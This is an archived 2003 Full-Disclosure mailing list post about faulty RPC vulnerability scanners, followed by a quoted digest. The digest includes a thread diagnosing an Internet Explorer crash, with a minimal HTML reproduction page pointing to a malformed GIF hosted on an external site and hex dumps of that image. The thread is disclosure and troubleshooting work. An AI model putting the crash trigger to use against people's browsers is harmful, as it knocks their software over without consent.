lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <017D1CFB0EC95A4F8E218DFFCAE616360790EE@ml1.jeraisy.com>
From: nrafi at jeraisy.com (Nadeem Rafi)
Subject: Scanning the PCs for RPC Vulnerability.

I have found some faults in the scanning tools available from Foundstone and Microsoft for RPC vulnerable machines. Both of  these tools are not error free. These tools are showing the ip addresses of even those machines which are Windows 9x, Windows98/Sec, Windows ME. Both tools are not free from this error.
And Foundstone's RPC Scan tool is even more error prone. If you even applied all the patches in correct  sequence even then some of my machines are reported as "Vulnerable".
 
Any body have any experience with these problems or any suggestions please let me know.
 
Best Regards,
 
Nadeem Rafi

	-----Original Message----- 
	From: full-disclosure-request@...ts.netsys.com [mailto:full-disclosure-request@...ts.netsys.com] 
	Sent: Wed 9/3/2003 3:39 AM 
	To: full-disclosure@...ts.netsys.com 
	Cc: 
	Subject: Full-Disclosure digest, Vol 1 #1083 - 33 msgs
	
	

	Send Full-Disclosure mailing list submissions to
	        full-disclosure@...ts.netsys.com
	
	To subscribe or unsubscribe via the World Wide Web, visit
	        http://lists.netsys.com/mailman/listinfo/full-disclosure
	or, via email, send a message with subject or body 'help' to
	        full-disclosure-request@...ts.netsys.com
	
	You can reach the person managing the list at
	        full-disclosure-admin@...ts.netsys.com
	
	When replying, please edit your Subject line so it is more specific
	than "Re: Contents of Full-Disclosure digest..."
	
	
	Today's Topics:
	
	   1. Re: Tracking a virus by logging infected machines (Joel R. Helgeson)
	   2. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tiago Halm)
	   3. RE: Tracking a virus by logging infected machines (Richard M. Smith)
	   4. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	   5. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	   6. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	   7. RE: New Microsoft Internet Explorer
	       mshtml.dll Denial of Service? (nonleft)
	   8. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (morning_wood)
	   9. RE: New Microsoft Internet Explorer  mshtml.dll Denial of Service? (Tiago Halm)
	  10. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Schmehl, Paul L)
	  11. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Steve Wray)
	  12. RE: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Steve Wray)
	  13. Re: JAP back doored (Daniel Tams)
	  14. sans.org (lepkie)
	  15. Re: sans.org (Marcus Graf)
	  16. Re: sans.org (martin f krafft)
	  17. RE: sans.org (Jerry Heidtke)
	  18. Re: sans.org - OFFTOPIC (Kurt Seifried)
	  19. RE: sans.org (Ryan Lowdermilk)
	  20. Re: sans.org (B3r3n)
	  21. Re: sans.org (Bernie, CTA)
	  22. RE: sans.org (Joshua Thomas)
	  23. Re: sans.org (Ben Nelson)
	  24. RE: sans.org (NDG)
	  25. Re: atari800 (200309-07) (- o s g o -)
	  26. RE: sans.org (Richard M. Smith)
	  27. RE: Email for sans.org? (Richard M. Smith)
	  28. Re: sans.org (james)
	  29. RE: sans.org - OFFTOPIC (David Vincent)
	  30. The Worm tard who got busted (Andre Ludwig)
	  31. Re: sans.org (Kurt Seifried)
	  32. Re: New Microsoft Internet Explorer mshtml.dll Denial of Service? (Tim)
	
	--__--__--
	
	Message: 1
	From: "Joel R. Helgeson" <joel@...geson.com>
	To: <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] Tracking a virus by logging infected machines
	Date: Tue, 2 Sep 2003 11:06:54 -0500
	
	Why would any virus writer do this?  This leads a clear audit trail that
	would lead the authorities directly back to the creator.
	
	I suppose it wouldn't be a bad thing if the virus author was looking for
	some free room & board for the next 5-10 years.
	
	Joel R. Helgeson
	Director of Networking & Security Services
	SymetriQ Corporation
	
	"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll
	be warm for the rest of his life."
	----- Original Message -----
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <jasonc@...ence.org>; <full-disclosure@...ts.netsys.com>
	Sent: Monday, September 01, 2003 6:38 PM
	Subject: [Full-Disclosure] Tracking a virus by logging infected machines
	
	
	> Hi Jason,
	>
	>    >>> Is there any way to determine who the winner is?
	>
	> Not that I want to encourage virus writing, but I think it would be very
	> helpful to gather infection statistics if a  virus were to keep a log of
	> the IP addresses of all the machines it infected.  The log could be
	> appended to the end of the executable file of the virus.  Each copy of a
	> worm or virus would contain a record of one branch of the tree of
	> infected machines.
	>
	> To make a log easy to locate and extract, the log can start with an
	> easily identified string such as "VIRUS INFECTION LOG\n".  IP addresses
	> should be recorded in ASCII with a \n between each IP address.
	>
	> Richard
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	
	--__--__--
	
	Message: 2
	From: "Tiago Halm" <thalm@...cabo.pt>
	To: "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 17:36:30 +0100
	
	Paul has a point here, I believe!
	
	After a **lot** of html code "trimming" I came with an offline version of
	the page like this:
	
	------------------------------------------------------
	<html>
	<body>
	<table border="0" cellspacing="0" cellpadding="0">
	<tr>
	    <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1"
	alt=""></td>
	</tr>
	</table>
	</body>
	</html>
	-------------------------------------------------------
	
	and this piece of code does crash my browser (6.0.2800.1106)
	on windows 2000 server all patches and fixes up to date.
	
	NOTE: Every time you **want** the browser to crash, you must delete it from
	the "Temporary Internet Files" before loading it in your browser.
	
	Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
	unrecognized image header".
	Does this image, in some way, affects the way IE does the parsing?
	Seems like it...
	
	Regards,
	Tiago Halm
	
	
	-----Original Message-----
	From: full-disclosure-admin@...ts.netsys.com
	[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Pellmann Paul
	Sent: ter?a-feira, 2 de Setembro de 2003 16:20
	To: 'full-disclosure@...ts.netsys.com'
	Subject: AW: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	Denial of Service?
	
	
	This seems to be caused by the 1x1 image http://www.galad.com/frame/e1x1.gif
	used within the page. If I block this URL the IE stops crashing with that
	page.
	
	cu
	Paul
	
	
	> > Its a mail client issue; doesn't happen if you click on
	> > a link from Internet Explorer.
	>
	> No, I am very sure that this happens also, if you follow the
	> link inside
	> a web page only (without an involving mail client).
	>
	> So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> click the link that says "Holger Hasselbach has translated several
	> issues of Crypto-Gram into German [...]". The error occurs as
	> described in my original posting.
	>
	> > Your mail headers don't exactly give away your own mail client.
	> > What would it be?
	>
	> Microsoft Outlook 2002 SP2 on Windows XP Professional
	>
	> Yours,
	>
	> Marc Ruef
	>
	> -----BEGIN PGP SIGNATURE-----
	> Version: PGP 8.0
	>
	> iQA/AwUBP1Rw4Be5hzJzqVMhEQKFkACeOBaQowm8I6p0P2Fb12C4E2ndwgoAniRK
	> qtApctQA9L1W78qDsE4Puuvz
	> =m0et
	> -----END PGP SIGNATURE-----
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	
	--__--__--
	
	Message: 3
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: "'Joel R. Helgeson'" <joel@...geson.com>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] Tracking a virus by logging infected machines
	Date: Tue, 2 Sep 2003 12:43:43 -0400
	
	To show off. ;-)  The author of the Marker virus did exactly this.
	
	Richard
	
	-----Original Message-----
	From: full-disclosure-admin@...ts.netsys.com
	[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joel R.
	Helgeson
	Sent: Tuesday, September 02, 2003 12:07 PM
	To: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] Tracking a virus by logging infected
	machines
	
	
	Why would any virus writer do this?  This leads a clear audit trail that
	would lead the authorities directly back to the creator.
	
	I suppose it wouldn't be a bad thing if the virus author was looking for
	some free room & board for the next 5-10 years.
	
	Joel R. Helgeson
	Director of Networking & Security Services
	SymetriQ Corporation
	
	"Give a man fire, and he'll be warm for a day; set a man on fire, and
	he'll
	be warm for the rest of his life."
	----- Original Message -----
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <jasonc@...ence.org>; <full-disclosure@...ts.netsys.com>
	Sent: Monday, September 01, 2003 6:38 PM
	Subject: [Full-Disclosure] Tracking a virus by logging infected machines
	
	
	> Hi Jason,
	>
	>    >>> Is there any way to determine who the winner is?
	>
	> Not that I want to encourage virus writing, but I think it would be
	very
	> helpful to gather infection statistics if a  virus were to keep a log
	of
	> the IP addresses of all the machines it infected.  The log could be
	> appended to the end of the executable file of the virus.  Each copy of
	a
	> worm or virus would contain a record of one branch of the tree of
	> infected machines.
	>
	> To make a log easy to locate and extract, the log can start with an
	> easily identified string such as "VIRUS INFECTION LOG\n".  IP
	addresses
	> should be recorded in ASCII with a \n between each IP address.
	>
	> Richard
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	
	--__--__--
	
	Message: 4
	Date: Tue, 2 Sep 2003 10:38:07 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: Tiago Halm <thalm@...cabo.pt>
	Cc: "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	
	Interesting...
	
	> After a **lot** of html code "trimming" I came with an offline version of
	> the page like this:
	>
	> ------------------------------------------------------
	> <html>
	> <body>
	> <table border="0" cellspacing="0" cellpadding="0">
	> <tr>
	>     <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1"
	> alt=""></td>
	> </tr>
	> </table>
	> </body>
	> </html>
	> -------------------------------------------------------
	>
	> and this piece of code does crash my browser (6.0.2800.1106)
	> on windows 2000 server all patches and fixes up to date.
	>
	> NOTE: Every time you **want** the browser to crash, you must delete it from
	> the "Temporary Internet Files" before loading it in your browser.
	>
	> Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
	> unrecognized image header".
	> Does this image, in some way, affects the way IE does the parsing?
	> Seems like it...
	
	
	Yeah, the GIF image is almost certainly mal-formed.  Not sure in what
	way yet, as I am no GIF expert.  Some interesting information though:
	
	Opening it in the GIMP produces the following errors on stderr:
	
	GIF: too much input data, ignoring extra...
	GIF: bogus character 0x00, ignoring
	
	
	The file's contents are:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   FF FF FF 21  F9 04 01 00  00 01 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 02 02 4C  01 00 3B                  .......L..;
	
	I then opened the file in the GIMP, and immediately saved it back to
	another gif file, and it wrote:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   00 00 00 21  F9 04 01 00  00 00 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 00 01 01  00 3B                     .........;
	
	
	Which obviously has some differences.  Anyone else better with GIF89a
	than I?
	
	tim
	
	
	--__--__--
	
	Message: 5
	Date: Tue, 2 Sep 2003 10:42:58 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: Irwan Hadi <irwanhadi@...by.com>
	Cc: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	> Even more interesting:
	> Received: from netsys.com (NETSYS.COM [199.201.233.10])
	>         by phxby.engr.usu.edu (Postfix) with ESMTP id 4A3F11443EF
	>         for <irwanhadi@...by.engr.usu.edu>; Tue,  2 Sep 2003 02:44:14
	> -0600 (MDT)
	> Received: from NETSYS.COM (localhost [127.0.0.1])
	>         by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827wOx20101;
	>         Tue, 2 Sep 2003 03:58:24 -0400 (EDT)
	> Received: from phxby.engr.usu.edu (phxby.engr.usu.edu [129.123.21.101])
	>         by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827uUE19665
	>         for <full-disclosure@...ts.netsys.com>; Tue, 2 Sep 2003 03:56:30
	> -0400 (EDT)
	> Received: by phxby.engr.usu.edu (Postfix, from userid 501)
	>         id 6607B14438C; Tue,  2 Sep 2003 01:56:24 -0600 (MDT)
	>
	> I believe that for infosec stuffs, the faster information being
	> distributed/sent is the better. Late putting patch just because the
	> information come almost 1 hour later after it is sent might be
	> catastropic.
	
	I don't know about catastrophic, but it certainly should be faster.  I
	personally find the speed of this list unacceptable.  For large lists
	with high volume, a list server written in a scripting language like
	python isn't going to cut it, IMHO.  I vote for qmail w/ ezmlm(-idx).
	(That is, if we get a vote in the matter.)
	
	tim
	
	
	--__--__--
	
	Message: 6
	Date: Tue, 2 Sep 2003 10:51:45 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: Tiago Halm <thalm@...cabo.pt>
	Cc: "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	
	Error in my last post.  I switched the order of the original and GIMP
	produced .gif on accident.  To clarify:
	
	Original:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   00 00 00 21  F9 04 01 00  00 00 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 00 01 01  00 3B                     .........;
	
	
	Processed and re-saved by GIMP:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  00 FF FF FF  GIF89a..........
	00000010   FF FF FF 21  F9 04 01 00  00 01 00 2C  00 00 00 00  ...!.......,....
	00000020   01 00 01 00  00 02 02 4C  01 00 3B                  .......L..;
	
	
	tim
	
	
	--__--__--
	
	Message: 7
	Date: Tue, 02 Sep 2003 20:14:52 +0200
	To: "Tiago Halm" <thalm@...cabo.pt>, "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	From: nonleft <nonleft@....net>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer
	  mshtml.dll Denial of Service?
	
	--=====================_2889214==.REL
	Content-Type: text/plain; charset="iso-8859-1"; format=flowed
	Content-Transfer-Encoding: quoted-printable
	
	could you figure out if it is a webbug than or just a transgif for layout?
	
	kind regards
	nonleft
	
	
	At 17:36 02.09.2003 +0100, Tiago Halm wrote:
	>Paul has a point here, I believe!
	>
	>After a **lot** of html code "trimming" I came with an offline version of
	>the page like this:
	>
	>------------------------------------------------------
	>2bd125.jpg
	>-------------------------------------------------------
	>
	>and this piece of code does crash my browser (6.0.2800.1106)
	>on windows 2000 server all patches and fixes up to date.
	>
	>NOTE: Every time you **want** the browser to crash, you must delete it from
	>the "Temporary Internet Files" before loading it in your browser.
	>
	>Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad=
	 or
	>unrecognized image header".
	>Does this image, in some way, affects the way IE does the parsing?
	>Seems like it...
	>
	>Regards,
	>Tiago Halm
	>
	>
	>-----Original Message-----
	>From: full-disclosure-admin@...ts.netsys.com
	>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Pellmann Paul
	>Sent: ter=E7a-feira, 2 de Setembro de 2003 16:20
	>To: 'full-disclosure@...ts.netsys.com'
	>Subject: AW: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	>Denial of Service?
	>
	>
	>This seems to be caused by the 1x1 image=
	 http://www.galad.com/frame/e1x1.gif
	>used within the page. If I block this URL the IE stops crashing with that
	>page.
	>
	>cu
	>Paul
	>
	>
	> > > Its a mail client issue; doesn't happen if you click on
	> > > a link from Internet Explorer.
	> >
	> > No, I am very sure that this happens also, if you follow the
	> > link inside
	> > a web page only (without an involving mail client).
	> >
	> > So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> > click the link that says "Holger Hasselbach has translated several
	> > issues of Crypto-Gram into German [...]". The error occurs as
	> > described in my original posting.
	> >
	> > > Your mail headers don't exactly give away your own mail client.
	> > > What would it be?
	> >
	> > Microsoft Outlook 2002 SP2 on Windows XP Professional
	> >
	> > Yours,
	> >
	> > Marc Ruef
	> >
	> > -----BEGIN PGP SIGNATURE-----
	> > Version: PGP 8.0
	> >
	> > iQA/AwUBP1Rw4Be5hzJzqVMhEQKFkACeOBaQowm8I6p0P2Fb12C4E2ndwgoAniRK
	> > qtApctQA9L1W78qDsE4Puuvz
	> > =3Dm0et
	> > -----END PGP SIGNATURE-----
	> >
	> > _______________________________________________
	> > Full-Disclosure - We believe in it.
	> > Charter: http://lists.netsys.com/full-disclosure-charter.html
	> >
	>
	>_______________________________________________
	>Full-Disclosure - We believe in it.
	>Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	>_______________________________________________
	>Full-Disclosure - We believe in it.
	>Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	--=====================_2889214==.REL
	Content-Type: image/jpeg; name="2bd125.jpg";
	 x-mac-type="4A504547"; x-mac-creator="4A565752"
	Content-ID: <5.2.0.9.2.20030902201142.00b46cc0@....gmx.de.0>
	Content-Transfer-Encoding: base64
	Content-Disposition: inline; filename="2bd125.jpg"
	
	/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB
	AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEB
	AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAEDASIA
	AhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQA
	AAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3
	ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWm
	p6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEA
	AwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSEx
	BhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElK
	U1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3
	uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD/AD/6
	KKKAP//Z
	--=====================_2889214==.REL--
	
	
	--__--__--
	
	Message: 8
	From: "morning_wood" <se_cur_ity@...mail.com>
	To: "Tim" <tim-security@...tinelchicken.org>,
	   "Irwan Hadi" <irwanhadi@...by.com>
	Cc: <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 11:23:09 -0700
	
	> > I believe that for infosec stuffs, the faster information being
	> > distributed/sent is the better. Late putting patch just because the
	> > information come almost 1 hour later after it is sent might be
	> > catastropic.
	>
	> I don't know about catastrophic, but it certainly should be faster.  I
	> personally find the speed of this list unacceptable.  For large lists
	> with high volume, a list server written in a scripting language like
	> python isn't going to cut it, IMHO.  I vote for qmail w/ ezmlm(-idx).
	> (That is, if we get a vote in the matter.)
	
	funny, i often see replies to my post long before i see my own post
	dont know why, does'nt always happen. But it is odd.
	Sometimes I wonder if the list is being siphoned for breaking sec info before
	the posts reach the subscribers.
	
	Donnie Werner
	http://e2-labs.com
	
	
	--__--__--
	
	Message: 9
	From: "Tiago Halm" <thalm@...cabo.pt>
	To: "'nonleft'" <nonleft@....net>, "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer  mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 19:49:07 +0100
	
	My feeling is that the following facts:
	
	- rendering engine of IE, complemented with the "online" download of the
	image
	- possible malformation of the image
	
	lead to this outcome (browser crash).
	There must be some code inside mshtml.dll that "crashes" when parsing the
	image.
	
	I get this "Application" event with source "Microsoft Internet Explorer", ID
	= 1000:
	-------------
	Faulting application iexplore.exe, version 6.0.2800.1106, faulting module
	mshtml.dll, version 6.0.2800.1226, fault address 0x00180ede.
	-------------
	
	This is not a webbug. I think this is only a transgif for layout (as you put
	it).
	And IE should take the image as invalid and should not even try to display
	it.
	
	Regards,
	Tiago Halm
	
	-----Original Message-----
	From: nonleft [mailto:nonleft@....net]
	Sent: ter?a-feira, 2 de Setembro de 2003 19:15
	To: Tiago Halm; 'Pellmann Paul'; full-disclosure@...ts.netsys.com
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	Denial of Service?
	
	
	could you figure out if it is a webbug than or just a transgif for layout?
	
	kind regards
	nonleft
	
	
	At 17:36 02.09.2003 +0100, Tiago Halm wrote:
	>Paul has a point here, I believe!
	>
	>After a **lot** of html code "trimming" I came with an offline version
	>of the page like this:
	>
	>------------------------------------------------------
	>2bd125.jpg
	>-------------------------------------------------------
	>
	>and this piece of code does crash my browser (6.0.2800.1106) on windows
	>2000 server all patches and fixes up to date.
	>
	>NOTE: Every time you **want** the browser to crash, you must delete it
	>from the "Temporary Internet Files" before loading it in your browser.
	>
	>Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a
	>"Bad or unrecognized image header". Does this image, in some way,
	>affects the way IE does the parsing? Seems like it...
	>
	>Regards,
	>Tiago Halm
	>
	>
	>-----Original Message-----
	>From: full-disclosure-admin@...ts.netsys.com
	>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Pellmann
	>Paul
	>Sent: ter?a-feira, 2 de Setembro de 2003 16:20
	>To: 'full-disclosure@...ts.netsys.com'
	>Subject: AW: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll
	>Denial of Service?
	>
	>
	>This seems to be caused by the 1x1 image
	>http://www.galad.com/frame/e1x1.gif
	>used within the page. If I block this URL the IE stops crashing with that
	>page.
	>
	>cu
	>Paul
	>
	>
	> > > Its a mail client issue; doesn't happen if you click on
	> > > a link from Internet Explorer.
	> >
	> > No, I am very sure that this happens also, if you follow the link
	> > inside a web page only (without an involving mail client).
	> >
	> > So go to http://www.counterpane.com/crypto-gram.html , scroll down
	> > and click the link that says "Holger Hasselbach has translated
	> > several issues of Crypto-Gram into German [...]". The error occurs
	> > as described in my original posting.
	> >
	> > > Your mail headers don't exactly give away your own mail client.
	> > > What would it be?
	> >
	> > Microsoft Outlook 2002 SP2 on Windows XP Professional
	> >
	> > Yours,
	> >
	> > Marc Ruef
	> >
	> > -----BEGIN PGP SIGNATURE-----
	> > Version: PGP 8.0
	> >
	> > iQA/AwUBP1Rw4Be5hzJzqVMhEQKFkACeOBaQowm8I6p0P2Fb12C4E2ndwgoAniRK
	> > qtApctQA9L1W78qDsE4Puuvz
	> > =m0et
	> > -----END PGP SIGNATURE-----
	> >
	> > _______________________________________________
	> > Full-Disclosure - We believe in it.
	> > Charter: http://lists.netsys.com/full-disclosure-charter.html
	> >
	>
	>_______________________________________________
	>Full-Disclosure - We believe in it.
	>Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	>_______________________________________________
	>Full-Disclosure - We believe in it.
	>Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	
	--__--__--
	
	Message: 10
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Tue, 2 Sep 2003 14:31:06 -0500
	From: "Schmehl, Paul L" <pauls@...allas.edu>
	Cc: <full-disclosure@...ts.netsys.com>
	
	> -----Original Message-----
	> From: morning_wood [mailto:se_cur_ity@...mail.com]
	> Sent: Tuesday, September 02, 2003 1:23 PM
	> To: Tim; Irwan Hadi
	> Cc: full-disclosure@...ts.netsys.com
	> Subject: Re: [Full-Disclosure] New Microsoft Internet
	> Explorer mshtml.dll Denial of Service?
	>
	> funny, i often see replies to my post long before i see my
	> own post dont know why, does'nt always happen. But it is odd.
	> Sometimes I wonder if the list is being siphoned for breaking
	> sec info before the posts reach the subscribers.
	
	More likely what you're seeing is the duplicate copy sent to your email
	address because the default for this list is reply to sender.  So most
	people just reply to all, and the cc list gets longer and longer and
	longer.  Later on, your post shows up on the list, so you see it then.
	But the replies come to you directly and much faster.
	
	Paul Schmehl (pauls@...allas.edu)
	Adjunct Information Security Officer
	The University of Texas at Dallas
	AVIEN Founding Member
	http://www.utdallas.edu/~pauls/
	
	
	--__--__--
	
	Message: 11
	From: "Steve Wray" <steve.wray@...adise.net.nz>
	To: "'Marc Ruef'" <maru@...p.ch>, <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Wed, 3 Sep 2003 08:04:36 +1200
	
	Ok I went there and no crash!
	:)
	Heres the html that I created to test the principal as
	well.
	
	My MSIE is 6.0.2800.1106.xpsp2.030422-1633
	
	I only experience the crash when clicking in Outlook 2002.
	
	
	[snip]
	> > Its a mail client issue; doesn't happen if you click on
	> > a link from Internet Explorer.
	>
	> No, I am very sure that this happens also, if you follow the
	> link inside
	> a web page only (without an involving mail client).
	>
	> So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> click the link that says "Holger Hasselbach has translated several
	> issues of Crypto-Gram into German [...]". The error occurs as
	> described
	> in my original posting.
	>
	> > Your mail headers don't exactly give away your own mail client.
	> > What would it be?
	>
	> Microsoft Outlook 2002 SP2 on Windows XP Professional
	>
	> Yours,
	>
	> Marc Ruef
	
	
	--__--__--
	
	Message: 12
	From: "Steve Wray" <steve.wray@...adise.net.nz>
	To: "'Tiago Halm'" <thalm@...cabo.pt>,
	   "'Pellmann Paul'" <pel@....magwien.gv.at>,
	   <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	Date: Wed, 3 Sep 2003 08:16:21 +1200
	
	So why is it that visiting the page directly from MSIE
	from html like this;
	<html>
	<head>
	</head>
	<body>
	<a href="http://www.galad.com/extras/cg/cg.htm">crash</a>
	</body>
	</html>
	
	I get no crash?
	But clicking through from outlook I do?
	Ie; clicking from outlook = crash
	clicking from IE = no crash
	clicking from outlook afterward = crash
	
	
	> -----Original Message-----
	> From: full-disclosure-admin@...ts.netsys.com
	> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
	> Tiago Halm
	> Sent: Wednesday, 3 September 2003 4:37 a.m.
	> To: 'Pellmann Paul'; full-disclosure@...ts.netsys.com
	> Subject: RE: [Full-Disclosure] New Microsoft Internet
	> Explorer mshtml.dll Denial of Service?
	>
	>
	> Paul has a point here, I believe!
	>
	> After a **lot** of html code "trimming" I came with an
	> offline version of
	> the page like this:
	>
	> ------------------------------------------------------
	> <html>
	> <body>
	> <table border="0" cellspacing="0" cellpadding="0">
	> <tr>
	>     <td><img src="http://www.galad.com/frame/e1x1.gif"
	> width="1" height="1"
	> alt=""></td>
	> </tr>
	> </table>
	> </body>
	> </html>
	> -------------------------------------------------------
	>
	> and this piece of code does crash my browser (6.0.2800.1106)
	> on windows 2000 server all patches and fixes up to date.
	>
	> NOTE: Every time you **want** the browser to crash, you must
	> delete it from
	> the "Temporary Internet Files" before loading it in your browser.
	
	
	--__--__--
	
	Message: 13
	Date: Tue, 2 Sep 2003 22:22:02 +0200 (CEST)
	From: Daniel Tams <dantams@...ieltams.dyndns.org>
	To: Helmut Hauser <helmut.hauser@...raplan.de>
	cc: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] JAP back doored
	
	On Tue, 2 Sep 2003, Helmut Hauser wrote:
	
	> The german police (BKA) striked again against the An.on Team
	>
	> See http://www.datenschutzzentrum.de/material/themen/presse/anon-bka.htm
	
	The choice of your subject line makes it seem that the article says that
	JAP has been backdoored again. The article does not say that. The article
	says that the police received a court order permitting them to enter and
	search the facilities of the Technical University of Dresden in order to
	find the data that was captured by the backdoor when it was in use.
	
	- Daniel
	
	
	--__--__--
	
	Message: 14
	Date: Tue,  2 Sep 2003 12:29:47 -0700
	To: full-disclosure@...ts.netsys.com
	Cc:
	From: "lepkie" <lepkie@...hmail.com>
	Reply-To: lepkie@...tmail.com
	Subject: [Full-Disclosure] sans.org
	
	maybe off topic
	
	can anyone resolve www.sans.org or www.incidents.org?
	I tried several name servers and none return an A record.
	
